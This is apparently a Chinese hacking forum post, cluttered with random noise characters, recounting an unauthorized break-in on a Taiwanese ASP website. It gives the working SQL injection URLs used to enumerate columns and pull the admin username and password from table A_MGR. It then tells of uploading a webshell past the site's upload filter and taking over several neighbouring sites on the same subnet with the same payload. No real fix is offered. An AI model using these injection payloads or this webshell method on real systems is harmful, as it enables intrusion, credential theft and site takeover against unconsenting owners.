发现一个注入点
( P/ s8 ^& z- i; bhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389# \- m2 m8 E: F: y
3 K. s9 }/ ^- j% x) F0 l( i9 a9 I习惯性的加’having1=1--
. T0 q5 p9 A* U# t
3 L2 x) M* H5 b% u: q. [+ Lhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
$ q5 u; @4 Q3 q7 l+ z$ F
* |% \9 a$ I- r: z+ t2 d+ I2 M00 R+ ~% C% z3 Q
( e a5 p- \" Z' L
爆出Diary_A.dl_Title(这时候很激动啊)6 y C* q. M7 ], g. I2 @; H; q. n
6 `& x6 k7 L- _
那么继续
4 |% |: C7 x: ], Y/ ` `http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—* c7 L9 J7 Y* ]" M
9 [7 P y, X3 y2 }5 V继续,一直爆下去
5 _) u1 }( Z" r( d& X2 v* O# G4 \7 d7 v$ q+ c
爆到几个字段和表段 但是没找到需要的管理用户的字段# L& Q4 I7 r' w
: K$ Y% G% p* |7 F# k蛋疼了 怎么办 然后去后台登陆页看源码
+ S" |1 b$ B, X1 M7 C7 p' | {" W% E& c1 C
07 F, J( `+ j! m! Z) a
1 i$ q- d' Y7 k" s: M2 VInput name= “ADUID”, Z$ Z# {4 j( _2 S
Input name= “ADPWD”
3 A' i) P! }/ @* v k3 E/ z. |# c) P, A6 V \ M
很幸运 找到了字段那就继续7 K+ q; ]' s$ t2 p. a5 r m/ Z* o, R
找到之后开始爆用户( \7 @2 y7 @( b) K+ X/ x
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—2 Z2 N3 P0 _3 L
爆密码
7 T7 N6 r( S& D6 f# r. p Qhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—/ e& ]5 \3 _! z
测试了下 这个注入点只能爆到文章哪里的表
* }) E+ j, s/ U$ B" D( t' }: }; p) S8 ?- z% K
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了* O A' H! @5 U! z8 a, P2 \4 Y
) t1 T, D! L* t/ V
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了: ^4 g- o; E% X6 g7 ^( Y5 {
0 ^; K# G; O6 k; `0 h6 r473( B v. o' C9 ^0 S1 |
# k) [) f' k) E' l7 b/ I进后台
4 `' O1 P% [/ R: @, D. ~5 ^1 C1 q% p4 Z% m" \
( g& J+ h# z- t5 L3 Z2 N. ?3 ]发现几个上传点 有的地方不能上传 而且防止恶意代码. b, N( ] d% a
$ L1 G) B7 B+ Q: [
没办法 各种百度各种找大牛 找到一只好像可以突破的马
2 s& f0 N7 o" ` G7 Y$ e/ i: I) g; T! O* T$ Q
9 E. M- r$ @( i
在系统管理那里直接上传 不过没有显示地址. u* e8 T, u' ^( q0 u
2 [0 g; S, y8 ~5 X再上传一次 抓包 搞定OK
; v2 b1 o: g; A) F1 i. C0 c' B- M+ k5 C/ H- J. w
5 A0 T& g Y' g- Q) w: m2 A
) L& g6 ~2 h3 P( ?) F) k
4723 A. z8 W# x0 `# y; c% @; }
, K- n3 ~" A4 I z6 Y; g1 e
晚上不行了 去睡觉。。。: h2 r/ r" N! t, P
第二天刚起床 闲的没事做继续日站吧 : u9 e' G! q: f" O( y+ p
( q" A4 g4 ~8 Y! r5 \
找个站 就把这个站的旁c扫了下
& ^6 U. S3 Z$ k: z$ r
, S9 e* d k; P% c2 k' J& t$ Z3 c发现c段也有一个购物站 ,然后还和这个站的模板差不多1 E1 a! L/ x8 V: D' v& V0 r
8 m2 [4 o# T/ I: @! _就找到会员登录口测试0 X1 ^7 u, }2 B& e9 `
* y" i. j% q6 N* ^2 C( |
'and (select top 1 MGR_UID from A_MGR)>0—9 q0 m; ]3 C8 C/ c4 z: l4 E) S
果断爆到了 这时候我很激动 通杀
0 |$ _* Y, f$ q7 C- \- P2 E! ^ V" ~* [' ? \3 T1 S+ o4 Y
再次翻c段
$ j* Q, P: ?3 t3 `5 X' ]! E% L/ `# O' V& W( M
翻出几个站 都成功拿下
8 t9 n4 O5 H- C3 a3 n" W3 X' H F' s4 ~# b* x
4 E. g9 f/ D) a# B7 T' F% g8 L; X) r8 C9 O$ \5 K( l9 Q4 h5 h
修复方案:/ |% A B4 ~* K7 P8 W5 y6 k6 P
他们比我专业
3 I8 ?0 X# V& o3 O
4 r$ s9 \ v# x0 {1 [- @$ P6 P1 t) @
% p: Z9 D* ^+ D q3 n( y u" _
2 x$ ~; a6 x" J$ C. c/ S |